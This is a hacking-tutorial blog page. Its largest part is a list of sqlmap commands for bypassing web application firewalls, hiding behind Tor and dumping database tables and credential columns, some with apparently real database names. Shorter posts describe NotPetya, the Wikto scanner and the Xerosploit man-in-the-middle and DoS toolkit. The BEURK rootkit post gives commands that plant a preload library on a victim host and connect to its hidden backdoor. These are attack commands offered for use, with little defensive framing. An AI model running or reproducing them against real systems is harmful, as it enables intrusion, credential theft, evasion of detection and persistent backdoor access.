Learn Penetration Testing And Ethical Hacking Online.


  • Popular Posts

    sqlmap advanced commands and WAF bypass methods

    sqlmap tamper WAF bypass method

    --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
    --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
    --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
    -v3 --technique=T --no-cast --fresh-queries --banner
    sqlmap -u http://www.********?id=1 --level 2 --risk 3 --batch --dbs

    -f -b --current-user --current-db --is-dba --users --dbs idcategoria=8

    --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

    sqlmap -u "http://URL/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1" --technique BT --dbms MYSQL --risk 3 --level 5 -p wpas_keys --tamper space2comment --sql-shell

    --risk 3 --level 5 --random-agent --proxy --dbs
    --random-agent --dbms=MYSQL --dbs --technique=B
    --identify-waf --random-agent -v 3 --dbs
    --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
    --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3
    --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump
    --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent

    sqlmap.py -u -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
    --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
    -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --colu

    C:\Python27\python.exe sqlmap.py --wizard
    --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

    sqlmap.py -u www.site.ps/index.php --level 5 --risk 3 --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql

    sqlmap.py -u www.site.ps/index.php --level 5 --risk 3 --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

    sqlmap.py -u www.site.ps/index.php --level 5 --risk 3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

    --level=5 --risk=3 -p "id" --tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"

    sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1' --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

    --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent
    --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables
    --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns
    --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump

    --tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql

    NotPetya Ransomware Wreaking Havoc

    The latest splash has been made by the Petya or NotPetya ransomware that exploded in Ukraine and is infecting companies all over the world. It's getting some people in deep trouble, as there's no way to recover the files once encrypted.

    The malware seems to be trying to hide its intent, as it doesn't really seem to be about making money: $300 is a pretty low amount, and they set up a very poor mechanism for collecting the money (the Posteo account they used has been shut down).

    At the current value of Bitcoin there's around $10,000 USD in the wallet mentioned, but with the e-mail address down there's no way for the victims to get in contact with the bad guys to decrypt their files.
    It's quite probably a nation state attack aimed at Ukraine, and it just happened to spread outside. It also doesn't spread over the Internet like WannaCry, but only over the local network.
    It seems to be using a whole bunch of tech with bits we've posted about, like Mimikatz and the NSA leak (a modified version of EternalBlue).
    It's definitely some pretty slick coding and an impressive piece of malware. But why has it been unleashed? Unfortunately, we're unlikely to find out.

    Wikto Scanner Download – Web Server Security Tool

    Wikto is an open source (GPL) web server scanner that performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version-specific problems on over 250 servers.

    What is Wikto

    Wikto is not a web application scanner. It is wholly unaware of the application (if any) that is running on the web site. So it will not look for SQL injection problems, authorization problems etc. on a web site. It is also not a network-level scanner, so it will not try to find open ports or check whether the web site is properly firewalled. Wikto rather operates between these two levels: it tries, for instance, to find interesting directories and files on the web site, it looks for sample scripts that can be abused, or it finds known vulnerabilities in the web server implementation itself.

    How does Wikto work?

    To understand the Wikto component of the application you need to know what Nikto is. Nikto is a text-based web server vulnerability scanner written in Perl by the good guys at CIRT. Nikto scans for over 3000 potential problems on a web server. It is beyond the scope of this document to explain what types of checks it performs; you can read all about it in the Nikto post. Like the BackEnd miner, the scanner has the ability to perform fuzzy logic on the responses, thereby greatly reducing the occurrence of false positives. It also has the ability to import directories from both the BackEnd miner and the Googler.

    Wikto vs Nikto

    Wikto is not just Nikto for Windows. The Nikto scan is just one of its several functions (and it performs the Nikto scans completely differently than Nikto does).

    It also has extra functionality including fuzzy logic error code checking, a back-end miner, Google-assisted directory mining and real-time HTTP request/response monitoring.

    Wikto Web Security Scanner Requirements

    To get the most out of the app you also need to install the following:

    WinHTTrack – a web mirroring tool (you can use the default install)
    HTTprint – a web server fingerprinting tool (by default, Wikto looks for this in the c:\Tools directory, but you can configure it)

    You can download Wikto here: https://github.com/sensepost/wikto/


    Xerosploit is a penetration testing toolkit whose goal is to perform man-in-the-middle attacks for testing purposes. It brings various modules that allow efficient attacks to be carried out, and it also allows denial of service attacks and port scanning. Powered by bettercap and nmap.



    • nmap
    • hping3
    • build-essential
    • ruby-dev
    • libpcap-dev
    • libgmp3-dev
    • tabulate
    • terminaltables


    Dependencies will be automatically installed.
    git clone https://github.com/LionSec/xerosploit
    cd xerosploit && sudo python install.py
    sudo xerosploit


    • Port scanning
    • Network mapping
    • DoS attack
    • HTML code injection
    • JavaScript code injection
    • Download interception and replacement
    • Sniffing
    • DNS spoofing
    • Background audio reproduction
    • Images replacement
    • Driftnet
    • Webpage defacement and more ...
    Linux Userland Preload Rootkit

    BEURK is a userland preload rootkit for GNU/Linux, heavily focused on anti-debugging and anti-detection.

    Being a userland rootkit it provides restricted privileges (whatever the user has, basically) vs a superuser or root-level rootkit.


    Hide attacker files and directories
    Realtime log cleanup (on utmp/wtmp)
    Anti process and login detection
    Bypass unhide, lsof, ps, ldd, netstat analysis
    Furtive PTY backdoor client


    Compile

    git clone https://github.com/unix-thrust/beurk.git
    cd beurk

    Install

    scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
    ./client.py victim_ip:port # connect with furtive backdoor


    The following packages are not required in order to build BEURK at the moment:
    • libpcap – to avoid local sniffing
    • libpam – for local PAM backdoor
    • libssl – for encrypted backdoor connection
    You can download BEURK here: https://github.com/unix-thrust/beurk
